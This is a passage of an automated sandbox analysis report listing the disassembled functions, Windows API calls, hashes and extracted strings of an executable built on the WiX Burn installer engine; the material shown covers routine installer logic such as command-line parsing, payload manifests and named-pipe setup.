                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.,burn.,00000000), ref: 0090568D
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 0090569F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString$lstrlen
                                                                                                                                                                                                                                                                            • String ID: -$Clean room command-line switch must be first argument on command-line.$Failed to allocate the list of ancestors.$Failed to allocate the list of dependencies to ignore.$Failed to copy append log file path.$Failed to copy last used source.$Failed to copy log file path.$Failed to copy parent.$Failed to copy path for layout directory.$Failed to copy source process path.$Failed to ensure size for secret args.$Failed to ensure size for unknown args.$Failed to initialize parent to none.$Failed to parse elevated connection.$Failed to parse embedded connection.$Failed to parse file handle: '%ls'$Failed to parse splash screen window: '%ls'$Failed to store the custom working directory.$Invalid switch: %ls$Missing required parameter for switch: %ls$Multiple mode command-line switches were provided.$Must specify a path for append log.$Must specify a path for log.$Must specify a path for original source.$Must specify a value for parent.$Must specify the elevated name, token and parent process id.$Must specify the embedded name, token and parent process id.$burn.$burn.ancestors$burn.clean.room$burn.elevated$burn.embedded$burn.engine.working.directory$burn.filehandle.attached$burn.filehandle.self$burn.ignoredependencies$burn.log.append$burn.log.mode$burn.passthrough$burn.related.addon$burn.related.chain.package$burn.related.dependent.addon$burn.related.dependent.patch$burn.related.detect$burn.related.patch$burn.related.update$burn.related.upgrade$burn.runonce$burn.splash.screen$burn.system.component$d:\a\wix4\wix4\src\burn\engine\core.cpp$disablesystemrestore$help$keepaupaused$layout$log$modify$noaupause$originalsource$package$parent$parent:none$passive$quiet$repair$silent$uninstall$unsafeuninstall$update$xlog
                                                                                                                                                                                                                                                                            • API String ID: 1657112622-287467567
                                                                                                                                                                                                                                                                            • Opcode ID: 58650ec05bd2a31d605282122272a8a76b26df26da8399998f1e6f400589e991
                                                                                                                                                                                                                                                                            • Instruction ID: 1f4107289b8b0c940662b8d8c7e8749c3fb20388ee880bf7f942e463a799e6d7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58650ec05bd2a31d605282122272a8a76b26df26da8399998f1e6f400589e991
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3B206B1688711BFEB20DF04CC4AF677369EB55B25F608A14FA65EB2D0D6B1E840CB50
                                                                                                                                                                                                                                                                            Function 008F18D8 Relevance: 179.7, APIs: 35, Strings: 67, Instructions: 1199COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 008F278C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,DirectorySearch,000000FF,00000000,Condition,008E7E53,00000000,Variable,008E7E4F,00000000,00951D1C,008E7E4B,008E7E4B), ref: 008F1A63
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,exists,00000000,00000000,Type,00000000,00000000,Path,008E7E5F), ref: 008F1AD2
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,path,00000000), ref: 008F1AEF
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,FileSearch,000000FF), ref: 008F1B15
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,exists,00000000,00000000,Type,00000000,00000000,DisableFileRedirection,008E7E63,00000000,Path,008E7E5F), ref: 008F1BB3
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 008F22EE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Compare$FreeHeap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch|ExtensionSearch|SetVariable$DisableFileRedirection$ExpandEnvironment$ExtensionId$ExtensionSearch$Failed to allocate memory for search structs.$Failed to find extension '%ls' for search '%ls'$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @ExtensionId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Value.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get DisableFileRedirection attribute.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$SetVariable$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$assignment$d:\a\wix4\wix4\src\burn\engine\search.cpp$directory$exists$formatted$keyPath$language$numeric$path$state$string$value$version
                                                                                                                                                                                                                                                                            • API String ID: 1229322287-2296787432
                                                                                                                                                                                                                                                                            • Opcode ID: ddb827d80582d490676fc965fcad5cddbc30ebc590a59c9984b781ee198a5221
                                                                                                                                                                                                                                                                            • Instruction ID: ad52e716075bc43c0ea7b6cf4366f06187807ad7d39c9a59c15fc812fc279e4b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddb827d80582d490676fc965fcad5cddbc30ebc590a59c9984b781ee198a5221
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2822831A84219BBDB209A628C4EF7F3969FBC6B29F210064FF14EB1D1D6749D41D760
                                                                                                                                                                                                                                                                            Function 008EF788 Relevance: 79.5, APIs: 2, Strings: 43, Instructions: 733COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: @Container is required for embedded payload.$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to add payload to container dictionary.$Failed to add payload to payloads dictionary.$Failed to allocate memory for layout payloads.$Failed to allocate memory for payload structs.$Failed to create dictionary for container payloads.$Failed to create dictionary for payloads.$Failed to find container: %ls$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$File size is required when verifying by hash for payload: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$There was no verification information for payload: %ls$d:\a\wix4\wix4\src\burn\engine\payload.cpp$embedded$external
                                                                                                                                                                                                                                                                            • API String ID: 1357844191-2408702627
                                                                                                                                                                                                                                                                            • Opcode ID: a339f1c4bfb2423ac129ea2289f280209c0b744f88f3c778f57534db214bd87f
                                                                                                                                                                                                                                                                            • Instruction ID: a495ef9f2c668a805f3a6af4db2bf4f24ac5dd6f6616db204821e988f1c83ed8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a339f1c4bfb2423ac129ea2289f280209c0b744f88f3c778f57534db214bd87f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE320631680295BBDB11DA178C4AF6F36B5FBC6B19F214038BB14FB1C2EAB0A941C755
                                                                                                                                                                                                                                                                            Function 009124F7 Relevance: 77.3, APIs: 1, Strings: 50, Instructions: 825COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF,00000000,?,?,?,?,?,00000000,00000000,?,008E6DA2,00000000,00000000,8000FFFF,?), ref: 00912EFE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get cached path for package: %ls, xrefs: 0091284E
                                                                                                                                                                                                                                                                            • Failed to append argument from ARP., xrefs: 00912B68
                                                                                                                                                                                                                                                                            • Failed to get command-line argument for install., xrefs: 00912A0F
                                                                                                                                                                                                                                                                            • %ls %ls, xrefs: 00912D05
                                                                                                                                                                                                                                                                            • Failed to run exe with Burn protocol from path: %ls, xrefs: 00912DA3
                                                                                                                                                                                                                                                                            • Failed to run netfx chainer: %ls, xrefs: 00912DE0
                                                                                                                                                                                                                                                                            • Process returned error: 0x%x, xrefs: 00912E64
                                                                                                                                                                                                                                                                            • burn.filehandle.self, xrefs: 00912C6D
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\exeengine.cpp, xrefs: 009125A5, 00912641, 00912646, 0091265A, 0091268D, 009126E2, 009126ED, 00912745, 00912750, 00912798, 009127D8, 009128D6, 009128E1, 00912A65, 00912A70, 00912E55, 00912E5B, 00912E72
                                                                                                                                                                                                                                                                            • Failed to copy package arguments., xrefs: 0091293D
                                                                                                                                                                                                                                                                            • QuietUninstallString is null., xrefs: 009126F5
                                                                                                                                                                                                                                                                            • burn.ignoredependencies, xrefs: 00912BB2
                                                                                                                                                                                                                                                                            • Failed to append the relation type to the command line., xrefs: 00912B9B
                                                                                                                                                                                                                                                                            • Failed to verify the QuietUninstallString executable path is in a secure location: %ls, xrefs: 009127C6
                                                                                                                                                                                                                                                                            • -%ls=%ls, xrefs: 00912BF9
                                                                                                                                                                                                                                                                            • Failed to separate command-line arguments., xrefs: 00912AAC
                                                                                                                                                                                                                                                                            • Failed to format obfuscated argument string., xrefs: 00912CE5
                                                                                                                                                                                                                                                                            • QuietUninstallString must contain an executable path., xrefs: 00912758
                                                                                                                                                                                                                                                                            • Failed to append the list of ancestors to the command line., xrefs: 00912C0D
                                                                                                                                                                                                                                                                            • Failed to query ArpEntry for %hs., xrefs: 00912593
                                                                                                                                                                                                                                                                            • Failed to append the custom working directory to the exepackage command line., xrefs: 00912C3E
                                                                                                                                                                                                                                                                            • The QuietUninstallString executable path is not in a secure location: %ls, xrefs: 009127F2
                                                                                                                                                                                                                                                                            • Failed to copy executable path., xrefs: 00912786
                                                                                                                                                                                                                                                                            • Failed to get command-line argument for repair., xrefs: 009129E2
                                                                                                                                                                                                                                                                            • Failed to get parent directory for pseudo-package: %ls, xrefs: 009126AC
                                                                                                                                                                                                                                                                            • "%ls", xrefs: 00912AE0
                                                                                                                                                                                                                                                                            • -%ls, xrefs: 00912B87
                                                                                                                                                                                                                                                                            • Failed to build executable path., xrefs: 0091267B, 0091287A
                                                                                                                                                                                                                                                                            • burn.related.chain.package, xrefs: 00912B7F
                                                                                                                                                                                                                                                                            • Invalid Exe package action: %d., xrefs: 009128EF, 00912A7E
                                                                                                                                                                                                                                                                            • install, xrefs: 0091258D, 00912592
                                                                                                                                                                                                                                                                            • Failed to get command-line argument for uninstall., xrefs: 00912A95
                                                                                                                                                                                                                                                                            • burn.ancestors, xrefs: 00912BF4
                                                                                                                                                                                                                                                                            • Pseudo ExePackages must have a fully qualified target path., xrefs: 0091264C
                                                                                                                                                                                                                                                                            • Failed to evaluate executable package command-line condition., xrefs: 00912AC3
                                                                                                                                                                                                                                                                            • Failed to allocate base command., xrefs: 00912AF4
                                                                                                                                                                                                                                                                            • Failed to format argument string., xrefs: 00912CB6
                                                                                                                                                                                                                                                                            • uninstall, xrefs: 00912586
                                                                                                                                                                                                                                                                            • WixBundleExecutePackageAction, xrefs: 009128B1, 00912F1D
                                                                                                                                                                                                                                                                            • -norestart, xrefs: 00912B3D
                                                                                                                                                                                                                                                                            • -%ls=ALL, xrefs: 00912BBA
                                                                                                                                                                                                                                                                            • Failed to append %ls, xrefs: 00912C72
                                                                                                                                                                                                                                                                            • Failed to parse QuietUninstallString: %ls., xrefs: 00912723
                                                                                                                                                                                                                                                                            • Failed to append the list of dependencies to ignore to the command line., xrefs: 00912BCE
                                                                                                                                                                                                                                                                            • Failed to append norestart argument., xrefs: 00912B51
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 00912EFE
                                                                                                                                                                                                                                                                            • Failed to run EXE process, xrefs: 00912E19
                                                                                                                                                                                                                                                                            • Failed to get parent directory for QuietUninstallString executable path: %ls, xrefs: 00912820
                                                                                                                                                                                                                                                                            • Failed to allocate obfuscated exe command., xrefs: 00912D19
                                                                                                                                                                                                                                                                            • WixBundleExecutePackageCacheFolder, xrefs: 00912899, 00912F0C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                            • String ID: -%ls$ -%ls=%ls$ -%ls=ALL$ -norestart$"%ls"$%ls %ls$Failed to allocate base command.$Failed to allocate obfuscated exe command.$Failed to append %ls$Failed to append argument from ARP.$Failed to append norestart argument.$Failed to append the custom working directory to the exepackage command line.$Failed to append the list of ancestors to the command line.$Failed to append the list of dependencies to ignore to the command line.$Failed to append the relation type to the command line.$Failed to build executable path.$Failed to copy executable path.$Failed to copy package arguments.$Failed to evaluate executable package command-line condition.$Failed to format argument string.$Failed to format obfuscated argument string.$Failed to get cached path for package: %ls$Failed to get command-line argument for install.$Failed to get command-line argument for repair.$Failed to get command-line argument for uninstall.$Failed to get parent directory for QuietUninstallString executable path: %ls$Failed to get parent directory for pseudo-package: %ls$Failed to parse QuietUninstallString: %ls.$Failed to query ArpEntry for %hs.$Failed to run EXE process$Failed to run exe with Burn protocol from path: %ls$Failed to run netfx chainer: %ls$Failed to separate command-line arguments.$Failed to verify the QuietUninstallString executable path is in a secure location: %ls$Invalid Exe package action: %d.$Process returned error: 0x%x$Pseudo ExePackages must have a fully qualified target path.$QuietUninstallString is null.$QuietUninstallString must contain an executable path.$The QuietUninstallString executable path is not in a secure location: %ls$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$burn.ancestors$burn.filehandle.self$burn.ignoredependencies$burn.related.chain.package$d:\a\wix4\wix4\src\burn\engine\exeengine.cpp$install$uninstall$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2962429428-1599644322
                                                                                                                                                                                                                                                                            • Opcode ID: eec6bfebfdcf20af1a3106696b55e78d32cee78ae842886aff782789c1ba18c9
                                                                                                                                                                                                                                                                            • Instruction ID: 2a2e00b688cf03a566921719cc427d7fcb9c37ae0f9c7f07b7946def1799f4fb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eec6bfebfdcf20af1a3106696b55e78d32cee78ae842886aff782789c1ba18c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D429531B8031DBBDF22AB94CC4AFEE7A79EB14B54F104111FA04BA1D1D7B19DA09B91
                                                                                                                                                                                                                                                                            Function 0093DA1F Relevance: 58.1, APIs: 21, Strings: 12, Instructions: 398COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0093DAB7
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DAC1
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 0093DB19
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DB23
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 0093DB71
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DB7B
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 0093DBCC
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DBD6
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 0093DC27
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DC31
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 0093DC82
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DC8C
                                                                                                                                                                                                                                                                            • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 0093DD8E
                                                                                                                                                                                                                                                                            • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 0093DDD9
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DDE3
                                                                                                                                                                                                                                                                            • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 0093DE2C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DE36
                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0093DE80
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DE8A
                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 0093DED9
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0093DF10
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                                                                                                                                                                                                                                            • String ID: Failed to create ACL for system restore.$Failed to create administrator SID for system restore.$Failed to create local service SID for system restore.$Failed to create local system SID for system restore.$Failed to create network service SID for system restore.$Failed to create self SID for system restore.$Failed to initialize COM security for system restore.$Failed to initialize security descriptor for system restore.$Failed to set DACL for system restore.$Failed to set administrators group access for system restore.$Failed to set administrators owner for system restore.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\srputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 267631441-1154305825
                                                                                                                                                                                                                                                                            • Opcode ID: c73fd1592ca0a040f1b2a62ffda659943d05a8337484b8f9819574416c8d8d76
                                                                                                                                                                                                                                                                            • Instruction ID: 4ec29505d9f09724f935e83e2003e38cd6df041ed6c2354d053b87e8596dc5ee
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c73fd1592ca0a040f1b2a62ffda659943d05a8337484b8f9819574416c8d8d76
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3D1A1B6D51229ABDB309B959C58FDEBBBCFF45700F01419AA918F7250D6708D40CEA0
                                                                                                                                                                                                                                                                            Function 008FBB84 Relevance: 42.2, APIs: 11, Strings: 13, Instructions: 249pipeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,008E6CF2,00000000), ref: 008FBBB4
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(008E73DE,00000000,008E6CF2,00000000,00000000,000000B0,?,?,008E6CF2,00000000,00000000), ref: 008FBBBD
                                                                                                                                                                                                                                                                            • CreateNamedPipeW.KERNEL32(00000000,00080003,00000000,00000001,00010000,00010000,00000001,008E6CF2,008E73DE,00000000,008E6CF2,00000000,00000000,000000B0), ref: 008FBC7D
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,008E6CF2,00000000,00000000), ref: 008FBC8B
                                                                                                                                                                                                                                                                            • CreateNamedPipeW.KERNEL32(00000000,00080003,00000000,00000001,00010000,00010000,00000001,00000000), ref: 008FBD32
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FBD3F
                                                                                                                                                                                                                                                                            • CreateNamedPipeW.KERNEL32(00000000,00080003,00000000,00000001,00010000,00010000,00000001,00000000), ref: 008FBDCE
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FBDD9
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,d:\a\wix4\wix4\src\burn\engine\pipe.cpp,0000012D,00000000), ref: 008FBE27
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,d:\a\wix4\wix4\src\burn\engine\pipe.cpp,0000012D,00000000), ref: 008FBE31
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 008FBE5F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$CreateNamedPipe$CloseDescriptorHandleSecurity$ConvertFreeLocalString
                                                                                                                                                                                                                                                                            • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of logging pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create cache pipe: %ls$Failed to create logging pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$\\.\pipe\%ls.Log$d:\a\wix4\wix4\src\burn\engine\pipe.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2306725211-1427415075
                                                                                                                                                                                                                                                                            • Opcode ID: 8ec0e5db10ac339e4487d011daa434a7f5e21af865fe8b4ca34a9efc6d013858
                                                                                                                                                                                                                                                                            • Instruction ID: e8338d0cd242acb04892670f694856b9c193bd9c5aee93cecf4bd4a80fed5b6c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ec0e5db10ac339e4487d011daa434a7f5e21af865fe8b4ca34a9efc6d013858
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5871C775E80229FBEB219AA5CC4AFEE7A68FB05B15F110115FF10FA1D0E3B45D409B91
                                                                                                                                                                                                                                                                            Function 0093A2D0 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 207encryptionfileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
